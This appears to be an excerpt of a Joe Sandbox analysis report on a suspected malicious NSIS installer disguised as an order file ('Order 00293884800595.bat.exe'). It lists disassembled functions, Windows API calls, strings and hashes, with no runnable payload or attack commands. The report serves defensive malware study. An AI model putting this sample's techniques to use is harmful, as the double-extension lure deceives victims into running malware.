CharPrevA.USER32(0000000C,0000000C,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
*?|<>/":, xrefs: 004065CF
"C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00406587

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Order 00293884800595.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3721164416
Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D

Function 00404394 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004043B1
GetSysColor.USER32(00000000), ref: 004043EF
SetTextColor.GDI32(?,00000000), ref: 004043FB
SetBkMode.GDI32(?,?), ref: 00404407
GetSysColor.USER32(?), ref: 0040441A
SetBkColor.GDI32(?,?), ref: 0040442A
DeleteObject.GDI32(?), ref: 00404444
CreateBrushIndirect.GDI32(?), ref: 0040444E

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58

Function 6CA52568 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 6CA512A5: GlobalAlloc.KERNEL32(00000040,6CA512C3,?,6CA5135F,-6CA5504B,6CA511C0,-000000A0), ref: 6CA512AD

GlobalFree.KERNEL32(?), ref: 6CA5266E
GlobalFree.KERNEL32(00000000), ref: 6CA526A8

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 51c40de35db1de15a428e282a565c78c4669c6b1a49f52f323f0c3313010891f
Instruction ID: 483705b477aa8ef8cdff4da4435621e168ee39bdc45a056d87e32bd519861593
Opcode Fuzzy Hash: 51c40de35db1de15a428e282a565c78c4669c6b1a49f52f323f0c3313010891f
Instruction Fuzzy Hash: 2D41F271205201EFCB088F54CC88CAF77BAFB86314BD4C62DF54187A51C73898AACB61

Function 00404C80 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
GetMessagePos.USER32 ref: 00404CA3
ScreenToClient.USER32(?,?), ref: 00404CBD
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5

Strings

f, xrefs: 00404CD1

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4

Function 00401E5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E5D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
ReleaseDC.USER32(?,00000000), ref: 00401E90
CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF

Strings

Tahoma, xrefs: 00401EC5

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
Opcode Fuzzy Hash: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D

Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
MulDiv.KERNEL32(0007BE29,00000064,0007BE2D), ref: 00402E90
wsprintfA.USER32 ref: 00402EA0
SetWindowTextA.USER32(?,?), ref: 00402EB0
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2

Strings

verifying installer: %d%%, xrefs: 00402E9A

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99

Function 6CA52381 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6CA524D7

Part of subcall function 6CA512B4: lstrcpynA.KERNEL32(00000000,?,6CA5135F,-6CA5504B,6CA511C0,-000000A0), ref: 6CA512C4

GlobalAlloc.KERNEL32(00000040,?), ref: 6CA52452
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6CA52467
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6CA52478
CLSIDFromString.OLE32(00000000,00000000), ref: 6CA52486
GlobalFree.KERNEL32(00000000), ref: 6CA5248D

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 5a2a21be517b58cd27e4b3d1a0b6edd1411a0864a2181cb1e5e8dec9d2fa442c
Instruction ID: e5b944c65f340d948cd53fd5f977f44af39c115410bb4304d0c84a743fce8886
Opcode Fuzzy Hash: 5a2a21be517b58cd27e4b3d1a0b6edd1411a0864a2181cb1e5e8dec9d2fa442c
Instruction Fuzzy Hash: 2141CFB1608301EFD7148F249848B6A77F8FF41325F94CA2AF546CAA80E774D4E9CB61

Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
GlobalFree.KERNEL32(?), ref: 004028C9
GlobalFree.KERNEL32(00000000), ref: 004028DC
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8

Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DA3
GetClientRect.USER32(?,?), ref: 00401DF1
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
DeleteObject.GDI32(00000000), ref: 00401E45

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58

Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB

Strings

!, xrefs: 00401C8F

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18

Function 00404B76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
wsprintfA.USER32 ref: 00404C1C
SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F

Strings

%u.%u%s%s, xrefs: 00404BFE

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
Opcode Fuzzy Hash: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9

Function 00405D0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,humpende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A

Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405CC6
Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405D60
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405D0D
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp, xrefs: 00405D13, 00405D18, 00405D1E, 00405D59, 00405D5F, 00405D67, 00405D6F

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf55F0.tmp
API String ID: 3248276644-3714600608
Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D

Function 00405C1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-787714339
Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD

Function 00405CB8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,C:\Users\user\AppData\Local\Temp\nsf55F0.tmp,763F3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe"), ref: 00405CC6
